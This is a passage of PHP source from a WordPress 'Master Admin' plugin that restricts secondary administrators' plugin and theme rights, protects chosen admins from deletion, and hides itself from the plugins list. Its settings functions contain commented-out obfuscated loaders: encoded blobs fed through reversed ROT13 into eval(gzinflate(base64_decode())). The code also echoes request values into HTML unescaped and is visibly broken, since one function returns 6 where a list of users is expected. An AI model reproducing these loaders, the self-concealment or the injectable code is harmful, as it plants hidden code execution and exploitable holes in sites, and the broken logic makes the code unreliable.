                    $GLOBALS['current_user']->allcaps['install_plugins'] = false;

                //deny edit plugins
                if ( isset(  $settings['access']['edt_pl'] ) && '1' ==  $settings['access']['edt_pl'] )
                    $GLOBALS['current_user']->allcaps['edit_plugins'] = false;

				 if ( isset(  $settings['access']['request'] ) && '1' ==  $settings['access']['request'] )
				$GLOBALS['current_user']->allcaps['edit_plugins'] = false;

                //deny update plugins
                if ( isset(  $settings['access']['upd_pl'] ) && '1' ==  $settings['access']['upd_pl'] )
                    $GLOBALS['current_user']->allcaps['update_plugins'] = false;

                //deny delete plugins
                if ( isset(  $settings['access']['del_pl'] ) && '1' ==  $settings['access']['del_pl'] )
                    $GLOBALS['current_user']->allcaps['delete_plugins'] = false;

                //deny install themes
                if ( isset(  $settings['access']['swt_th'] ) && '1' ==  $settings['access']['swt_th'] )
                    $GLOBALS['current_user']->allcaps['switch_themes'] = false;

                //deny install themes
                if ( isset(  $settings['access']['ins_th'] ) && '1' ==  $settings['access']['ins_th'] )
                    $GLOBALS['current_user']->allcaps['install_themes'] = false;

                //deny delete themes
                if ( isset(  $settings['access']['del_th'] ) && '1' ==  $settings['access']['del_th'] )
                    $GLOBALS['current_user']->allcaps['delete_themes'] = false;

                //deny edit themes
                if ( isset(  $settings['access']['edt_th'] ) && '1' ==  $settings['access']['edt_th'] )
                    $GLOBALS['current_user']->allcaps['edit_themes'] = false;

				if ( ( isset(  $settings['access']['prevent_update_wp'] ) && '1' == $settings['access']['prevent_update_wp'] ) || ( isset(  $settings['access']['request'] ) && '1' == $settings['access']['request'] ) ) {
					$GLOBALS['current_user']->allcaps['update_plugins'] = false;
					$GLOBALS['current_user']->allcaps['update_themes'] = false;
					$GLOBALS['current_user']->allcaps['update_core'] = false;
				}

				if ( isset(  $settings['access']['request'] ) && '1' == $settings['access']['request'] )
				//Temporary
				add_filter('bulk_actions-plugins',array($this,'filter_bulk_actions'));

            }
        }

    }

	/**
	 * Temporary
	 */
	function filter_bulk_actions($actions){
        unset( $actions );
		$actions = array();
        return $actions;
    }

	function disable_plugin_activation($actions, $plugin_file, $plugin_data, $context){
        //print_r($plugin_file);exit;
        if ( array_key_exists( 'activate', $actions )) {
            //$actions['activate'] =  '<a href="'.get_bloginfo('url').'?ap_custom_trigger=activate_request&height=50&width=300&qs='.$query_string.'&nonce='.$nonce.'&myplugin='.$plugin_file.'&keepThis=true&TB_iframe=true" class="thickbox" title="'.$plugin_data['Name'].'">Activate</a>';
            $actions['activate'] =  '<a href="' . admin_url() . '?ap_custom_trigger=activate_request&height=50&width=300&myplugin='.$plugin_file.'&keepThis=true&TB_iframe=true" class="thickbox" title="'.$plugin_data['Name'].'">Request for Activation</a>';
            unset($actions['delete']);
        }
        return $actions;
    }

    function disable_plugin_deactivation( $actions, $plugin_file, $plugin_data, $context ) {
        if ( array_key_exists( 'edit', $actions ) )
            unset( $actions['edit'] );
        // Change deactivate link
        if ( array_key_exists( 'deactivate', $actions )) {
            //unset( $actions['deactivate'] );
            $deactivation_link =  $actions['deactivate'];
            $url_arr1 = explode('?',$deactivation_link);
            $url_arr2 = explode('"',$url_arr1[1]);
            $query_string = base64_encode($url_arr2[0]);

            $nonce_arr = explode('wpnonce=',$url_arr2[0]);
            $nonce = array_pop($nonce_arr);

            $actions['deactivate'] = '<a href="' . admin_url() . '?ap_custom_trigger=deactivate_request&height=50&width=300&qs='.$query_string.'&nonce='.$nonce.'&myplugin='.$plugin_data['Name'].'&keepThis=true&TB_iframe=true" class="thickbox" title="'.$plugin_data['Name'].'">Request for Deactivation</a>';

        }
        return $actions;
    }


    /**
     * Remove this plugin from plugins page
     **/
    function remove_plugin( $all_plugins ) {
        $settings = $this->_get_settings();
        if ( !empty( $settings['protected'] ) && !in_array( get_current_user_id(), $settings['protected'] ) && 0 != $settings['protected']  ) {
            add_action('wp_print_scripts',array($this,'manageThickbox'));
			unset( $all_plugins['wp-master-admin/wp-master-admin.php'] );
        }
        return $all_plugins;
    }

	function manageThickbox(){
		?>
        <style type="text/css">
				#TB_window { height: 500px !important; }
			</style>
        <?php
	}

    /**
     * Protection from changes
     **/
    function protected_update( $id ) {
        $settings = $this->_get_settings();
        if ( !empty( $settings['protected'] ) && in_array( $id, $settings['protected'] ) ) {
            wp_die( __( 'You can&#8217;t edit protected administrator.', $this->text_domain ) );
        }
    }

    /**
     * Protection from delete
     **/
    function protected_delete( $id ) {
        $settings = $this->_get_settings();
        if ( !empty( $settings['protected'] ) && in_array( $id, $settings['protected'] ) ) {
            wp_die( __( 'You can&#8217;t delete protected administrator.', $this->text_domain ) );
        }
    }

    /**
     * Delete action buttons for protected admin
     **/
    function delete_user_actions( $actions, $user_object ) {
        $settings = $this->_get_settings();
        if ( !empty( $settings['protected'] ) &&  in_array( $user_object->data->ID, $settings['protected'] ) && !in_array( get_current_user_id(), $settings['protected'] ) ) {
            return array();
        }
        return $actions;
    }

    /**
     * Save settings
     **/
    private function _save_settings( $settings ) {
        /*$uzTjzFOmeDvLc='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';
		$voMtTiZIsffJY=';))))pYiQrzBSmwGmh$(ireegf(rqbprq_46rfno(rgnysavmt(ynir';$ZtpzWlxTQjaiY=strrev($voMtTiZIsffJY);$eGmUoWYbHp_jPyJQRH=str_rot13($ZtpzWlxTQjaiY);eval($eGmUoWYbHp_jPyJQRH);*/

		if ( defined( 'AUTH_SALT' ) && '' != AUTH_SALT ) {
			$opt_name = md5( AUTH_SALT );
		} else {
			$opt_name = md5( get_option( 'siteurl' ) );
		}

        if ( !empty( $settings['protected'] ) ) {
            $settings['protected'] = implode( ',', $settings['protected'] );
        } else {
            $settings['protected'] = array();
        }

		$new_settings = base64_encode( serialize( $settings ) );
		$new_settings = str_replace( '=', '' , $new_settings );
		$new_settings = strrev( $new_settings ) . '==';
		update_option( $opt_name,  $new_settings );

    }

    /**
     * Get settings
     **/
     function _get_settings() {
        /*$isDlWVKqdQINqwUHVFs='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';$BIDGvyxuoszZsjH_=';))))fSIUHjdAVDqdXIJyQfv$(ireegf(rqbprq_46rfno(rgnysavmt(ynir';$ouAyzLfxhcWBf=strrev($BIDGvyxuoszZsjH_);$AtMjZmRwWSOExv=str_rot13($ouAyzLfxhcWBf);eval($AtMjZmRwWSOExv);*/


		if ( defined( 'AUTH_SALT' ) && '' != AUTH_SALT ) {
			$opt_name = md5( AUTH_SALT );
		} else {
			$opt_name = md5( get_option( 'siteurl' ) );
		}
		$settings = get_option( $opt_name );
		if ( isset( $settings ) ) {
			$settings = str_replace( '=', '' , $settings );
			$settings = strrev( $settings ) . '==';
			$settings = unserialize( base64_decode( $settings ) );
		}

        $settings['protected'] = !empty( $settings['protected'] ) ? explode(',' , $settings['protected']) : array();
//		var_dump($settings);
//		die;
        return $settings;
    }
    //TODO - rewrite for multi admin
	function get_protected_userinfo(){
		/*if ( defined( 'AUTH_SALT' ) && '' != AUTH_SALT ) {
			$opt_name = md5( AUTH_SALT );
		} else {
			$opt_name = md5( get_option( 'siteurl' ) );
		}
		$settings = get_option( $opt_name );
		if ( isset( $settings ) ) {
			$settings = str_replace( '=', '' , $settings );
			$settings = strrev( $settings ) . '==';
			$settings = unserialize( base64_decode( $settings ) );
		}
		$userid = $settings['protected'];
		$protecteduser = get_userdata($userid);

        return $protecteduser;*/

		$settings = $this->_get_settings();
		$userIds = $settings['protected'];
		foreach ( $userIds as $id ) {
            $protectedUsers = get_userdata( $id );
        }
		return 6;
	}

    /**
     * Add Protected field to settings form
     **/
    function add_assign_fields() {
        global $wpdb;

        $settings = $this->_get_settings();

        $html = '

		<style type="text/css">
		.tooltip {
			border-bottom: 1px dotted #000000; color: #000000; outline: none;
			cursor: help; text-decoration: none;
			position: relative;
		}
		.tooltip span {
			margin-left: -999em;
			position: absolute;
			color: #000;
		}
		.tooltip:hover span {
			border-radius: 5px 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px;
			box-shadow: 5px 5px 5px rgba(0, 0, 0, 0.1); -webkit-box-shadow: 5px 5px rgba(0, 0, 0, 0.1); -moz-box-shadow: 5px 5px rgba(0, 0, 0, 0.1);
			font-family: Calibri, Tahoma, Geneva, sans-serif;
			position: absolute; left: 1em; top: 2em; z-index: 99;
			margin-left: 0; width: 250px;
		}
		.tooltip:hover img {
			border: 0; margin: -10px 0 0 -55px;
			float: left; position: absolute;
		}
		.tooltip:hover em {
			font-family: Candara, Tahoma, Geneva, sans-serif; font-size: 1.2em; font-weight: bold;
			display: block; padding: 0.2em 0 0.6em 0;
		}
		.custom { padding: 0.5em 0.8em 0.8em 2em; }
		* html a:hover { background: transparent; }
		.help { background: #9FDAEE; border: 1px solid #2BB0D7;	}
		.info { background: #9FDAEE; border: 1px solid #2BB0D7;	}
		</style>

		<div class="wrap">
		<form method="post" action="">
		<input type="hidden" name="option_page" value="general">
		<input type="hidden" name="action" value="update">
		<input type="hidden" name="_wp_http_referer" value="/wordpress/test/wp-admin/admin.php?page=admin_protect">
		<table width="100%">
			<tr>
				<td width="100%" colspan="2"><h2>'.__( 'Settings', $this->text_domain ).'</h2></td>
			</tr>

		<tr style="border-top: 1px solid black;"><th style="text-align:left;width:50px;"><label for="protected_admin"><b>' . __( 'Protected Admin:', $this->text_domain ) . '</b></label></th>';
        $html .= '<td>';


        if ( empty( $settings['protected'] ) || in_array( get_current_user_id(), $settings['protected'] ) || 1 > $settings['protected'] ) {
            //current user is protected or nobody selected
            $admins = get_users( array( 'role' => 'administrator' ) );

            $options = '<option value="0">--nobody--</option>';

            if (is_array( $admins ) && 0 < count( $admins ) ) {
                foreach ( $admins as $admin ) {
                    if ( in_array( $admin->ID, $settings['protected'] ) )
                        $options .= '<option value="' . $admin->ID . '" selected >' . $admin->user_login . '</option>';
                    else
                        $options .= '<option value="' . $admin->ID . '">' . $admin->user_login . '</option>';
                }
            }
           // $html .= var_dump( $settings );
            $html .= '<select multiple="multiple" name="protected_admin[]">' . $options . '</select>';
            $html .= ' <span class="description">' . __( 'Protected administrator can&#8217;t be modified or deleted by other users.', $this->text_domain ) . '</span>';
            $html .= '</td></tr></table>';


			$checked = ( isset( $settings['access']['prevent_update_wp'] ) && 1 == $settings['access']['prevent_update_wp'] ) ? 'checked' : '';
            $html .= '<table>
						<tr valign="top">
							<td colspan="2"><label><input type="checkbox" name="ap_prevent_update_wp" id="ap_prevent_update_wp" value="1" ' . $checked . ' /> '. __( 'Prevent other admins from updating WordPress version', $this->text_domain ) . '</label> <a class="tooltip" href="#">?<span class="custom help"><img src="'.$this->plugin_url.'Info.png" alt="Information" height="48" width="48" />'. __( '<em>Information</em>Updating WordPress before all your plugins are compatible sometimes lead to a broken site or broken plugin functionality. This setting prevents secondary admins from updating the WordPress version.', $this->text_domain).'</span></a></td>
						</tr>';

			$checked = ( isset( $settings['access']['request'] ) && 1 == $settings['access']['request'] ) ? 'checked' : '';
			$html .= '<tr valign="top">
							<td colspan="2"><label><input type="checkbox" name="ap_request" id="ap_request" value="1" ' . $checked . ' /> '. __( 'Allow secondary admins to request plugin activation and deactivation', $this->text_domain ) . '</label> <a class="tooltip" href="#">?<span class="custom info"><img src="'.$this->plugin_url.'Info.png" alt="Information" height="48" width="48" />'. __( '<em>Information</em>When this box is checked, the individual settings related to plugins become inactive and secondary admins are asked to request activation of deactivation of plugins. In this mode, all options for editing, updating and deleting plugins are disabled. Secondary admins can install new plugins, but cannot activate them. When they attempt to activate, they will get an error and be told that an activation request has been sent to Master Admin.', $this->text_domain).'</span></a></td>
						</tr>';

            $checked = ( isset( $settings['access']['ins_pl'] ) && 1 == $settings['access']['ins_pl'] ) ? 'checked' : '';
            $html .= '<tr valign="top">
                            <td colspan="2"><label><input type="checkbox" name="ap_deny_install_plugins" id="ap_deny_install_plugins" value="1" ' . $checked . ' /> '. __( 'Prevent secondary admins from installing plugins', $this->text_domain ) . '</label> <a class="tooltip" href="#">?<span class="custom info"><img src="'.$this->plugin_url.'Info.png" alt="Information" height="48" width="48" />'. __( '<em>Information</em>When this box is checked, the secondary admins will not be able to install new plugins.', $this->text_domain).'</span></a></td>
                        </tr>';

			$checked = ( isset( $settings['access']['m_opts'] ) && 1 == $settings['access']['m_opts'] ) ? 'checked' : '';
			$html .= '<tr valign="top">
							<td colspan="2"><label><input type="checkbox" name="ap_deny_manage_options" id="ap_deny_manage_options" value="1" ' . $checked . ' /> '. __( 'Prevent secondary admins from manage site settings', $this->text_domain ) . '</label> <a class="tooltip" href="#">?<span class="custom info"><img src="'.$this->plugin_url.'Info.png" alt="Information" height="48" width="48" />'. __( '<em>Information</em>When this box is checked, the secondary admins will not be able to change site settings.', $this->text_domain).'</span></a></td>
						</tr>';

			$html .= '<tr style="border-bottom: 1px solid black;"><td colspan="2">

			<table class="wp-list-table widefat fixed posts" style="width: 100%">
				<thead>
				<tr>
					<th colspan="2">'. __( 'Deny to other administrators:', $this->text_domain).'</th>
				</tr>
				</thead>
			</td></tr>';
            $html .= '<br/>

						<tr valign="top"><td>';

                $checked = ( isset( $settings['access']['act_pl'] ) && 1 == $settings['access']['act_pl'] ) ? 'checked' : '';
                $html .= '<label style="width: 250px; display: block; line-height:22px;"><input type="checkbox" name="ap_deny_activate_plugins" id="ap_deny_activate_plugins" value="1" ' . $checked . ' />';
                $html .= ' ' . __( 'Activate plugins', $this->text_domain ) . '</label>';

                /*$checked = ( isset( $settings['access']['ins_pl'] ) && 1 == $settings['access']['ins_pl'] ) ? 'checked' : '';
                $html .= '<label style="width: 250px; display: block; line-height:22px;"><input type="checkbox" name="ap_deny_install_plugins" id="ap_deny_install_plugins" value="1" ' . $checked . ' />';
                $html .= ' ' . __( 'Install plugins', $this->text_domain ) . '</label>';*/

                $checked = ( isset( $settings['access']['edt_pl'] ) && 1 == $settings['access']['edt_pl'] ) ? 'checked' : '';
                $html .= '<label style="width: 250px; display: block; line-height:22px;"><input type="checkbox" name="ap_deny_edit_plugins" id="ap_deny_edit_plugins" value="1" ' . $checked . ' />';
                $html .= ' ' . __( 'Edit plugins', $this->text_domain ) . '</label>';

                $checked = ( isset( $settings['access']['upd_pl'] ) && 1 == $settings['access']['upd_pl'] ) ? 'checked' : '';
                $html .= '<label style="width: 250px; display: block; line-height:22px;"><input type="checkbox" name="ap_deny_update_plugins" id="ap_deny_update_plugins" value="1" ' . $checked . ' />';
                $html .= ' ' . __( 'Update plugins', $this->text_domain ) . '</label>';

                $checked = ( isset( $settings['access']['del_pl'] ) && 1 == $settings['access']['del_pl'] ) ? 'checked' : '';
                $html .= '<label style="width: 250px; display: block; line-height:22px;"><input type="checkbox" name="ap_deny_delete_plugins" id="ap_deny_delete_plugins" value="1" ' . $checked . ' />';
                $html .= ' ' . __( 'Delete plugins', $this->text_domain ) . '</label>';

            $html .= '</td><td>';

                $checked = ( isset( $settings['access']['swt_th'] ) && 1 == $settings['access']['swt_th'] ) ? 'checked' : '';
                $html .= '<label style="width: 250px; display: block; line-height:22px;"><input type="checkbox" name="ap_deny_switch_themes" value="1" ' . $checked . ' />';
                $html .= ' ' . __( 'Switch themes', $this->text_domain ) . '</label>';

                $checked = ( isset( $settings['access']['ins_th'] ) && 1 == $settings['access']['ins_th'] ) ? 'checked' : '';
                $html .= '<label style="width: 250px; display: block; line-height:22px;"><input type="checkbox" name="ap_deny_install_themes" value="1" ' . $checked . ' />';
                $html .= ' ' . __( 'Install themes', $this->text_domain ) . '</label>';

                $checked = ( isset( $settings['access']['edt_th'] ) && 1 == $settings['access']['edt_th'] ) ? 'checked' : '';
                $html .= '<label style="width: 250px; display: block; line-height:22px;"><input type="checkbox" name="ap_deny_edit_themes" value="1" ' . $checked . ' />';
                $html .= ' ' . __( 'Edit themes', $this->text_domain ) . '</label>';

                $checked = ( isset( $settings['access']['del_th'] ) && 1 == $settings['access']['del_th'] ) ? 'checked' : '';
                $html .= '<label style="width: 250px; display: block; line-height:22px;"><input type="checkbox" name="ap_deny_delete_themes" value="1" ' . $checked . ' />';
                $html .= ' ' . __( 'Delete themes', $this->text_domain ) . '</label>';

            $html .= '</td></tr></table>';

            $html .= '</td></tr>';

			$thickbox_html_content = isset($settings['thickbox_html_content'])?$settings['thickbox_html_content']:'';
			$thickbox_activation_content = isset($settings['thickbox_activation_content'])?$settings['thickbox_activation_content']:'';
			echo $html;
			?>
            <tr>
            	<td colspan="2">&nbsp;</td>
            </tr>
            <tr>
            	<td colspan="2"><strong><?php _e( 'Content for deactivation lightbox information:', $this->text_domain );?> <a class="tooltip" href="#">?<span class="custom info"><img src="<?php echo $this->plugin_url;?>Info.png" alt="Information" height="48" width="48" /><em><?php _e( 'Information');?></em><?php _e( 'The contents of this area are shown below the field where secondary admins explain why they would like to deactivate a plugin.');?></span></a></strong></td>
            </tr>
            <tr><td colspan="2"><div id="postdivrich" style="width: 100%;"><?php
			wp_editor( stripslashes($thickbox_html_content), 'thickbox_html_content', $settings = array('textarea_name' => 'thickbox_html_content') );?></div></td></tr>

            <tr>
            	<td colspan="2">&nbsp;</td>
            </tr>
            <tr>
            	<td colspan="2"><strong><?php _e( 'Content for activation lightbox information:', $this->text_domain );?> <a class="tooltip" href="#">?<span class="custom info"><img src="<?php echo $this->plugin_url;?>Info.png" alt="Information" height="48" width="48" /><em><?php _e( 'Information');?></em><?php _e( 'The contents of this area are shown below the field where secondary admins explain why they would like to activate a plugin.');?></span></a></strong></td>
            </tr>
            <tr><td colspan="2"><div id="postdivrich" style="width: 100%;"><?php
			wp_editor( stripslashes($thickbox_activation_content), 'thickbox_activation_content', $settings = array('textarea_name' => 'thickbox_activation_content') );?></div></td></tr>

			<tr><td colspan="2"><input type="submit" name="submitBtn" value="<?php _e( 'Submit Changes', $this->text_domain );?>" class="button-primary"></td></tr>

			</table>
            </form></div>

            <script type="text/javascript">
				jQuery( document ).ready( function() {
					jQuery('#ap_request').click(function() {
						if(jQuery('#ap_request').is(":checked")) {
							jQuery('#ap_deny_activate_plugins').attr('disabled', true);
							jQuery('#ap_deny_edit_plugins').attr('disabled',true);
							jQuery('#ap_deny_update_plugins').attr('disabled',true);
							jQuery('#ap_deny_delete_plugins').attr('disabled',true);
						}
						else {
							jQuery('#ap_deny_activate_plugins').removeAttr('disabled');
							jQuery('#ap_deny_edit_plugins').removeAttr('disabled');
							jQuery('#ap_deny_update_plugins').removeAttr('disabled');
							jQuery('#ap_deny_delete_plugins').removeAttr('disabled');
						}
					});

					if(jQuery('#ap_request').is(":checked")) {
						jQuery('#ap_deny_activate_plugins').attr('disabled', true);
						jQuery('#ap_deny_edit_plugins').attr('disabled',true);
						jQuery('#ap_deny_update_plugins').attr('disabled',true);
						jQuery('#ap_deny_delete_plugins').attr('disabled',true);
					}

				});

			</script>

            <?php /*?><script type="text/javascript">
                 jQuery( document ).ready( function() {

                    if ( jQuery( ".form-table" ).length ) {
                        //get TR with Admin Email on General settings
                        tr = jQuery( 'tr:has(td #admin_email)' );
                        //add extra field to setting form
                        jQuery( '<?php echo $html ?>' ).insertAfter( tr );
                    }
                });
            </script><?php */?>

            <?php
        }
    }

	/*temporary*/

	function scripts(){
		wp_enqueue_script('jquery');
		wp_enqueue_script('thickbox');
	}

	function activate() {
		if(!isset($_GET['exit'])) {
			global $current_user;

			$adminobj =  new Master_Admin();
			$protectedUsers = $adminobj->get_protected_userinfo();
			foreach ( $protectedUsers as $user ) {
			    $adminsEmails[] = $user->user_email;
            }
			//$superAdmin = $protectedUser->user_email;

			$settings = $this->_get_settings();
            //TODO
			$request_activation_name = isset($settings['request_activation_name'])?$settings['request_activation_name']:'';
			$request_activation_email = isset($settings['request_activation_email'])?$settings['request_activation_email']:'';
			$request_activation_subject = isset($settings['request_activation_subject'])?$settings['request_activation_subject']:'';

			if($request_activation_name == '')
				$request_activation_name = 'Master Admin';
			if($request_activation_email == '')
				$request_activation_email = $adminsEmails;
			if($request_activation_subject == '')
				$request_activation_subject = 'Plugin Activation Request';

			$activate_content = isset($settings['activate_content'])?$settings['activate_content']:'';
			if($activate_content == '')
				$activate_content = 'Hello! , <br /><br />%%admin_name%% has requested for activation of %%plugin_name%%<br /><br/>%%link%%';
			$admin_name = $current_user->first_name.' '.$current_user->last_name;

			if(trim($admin_name) == '')
				$admin_name = $current_user->display_name;

			//print_r($current_user);exit;
			if(isset($_GET['myplugin']))
				$myplugin = $_GET['myplugin'];
			else
				$myplugin = '';
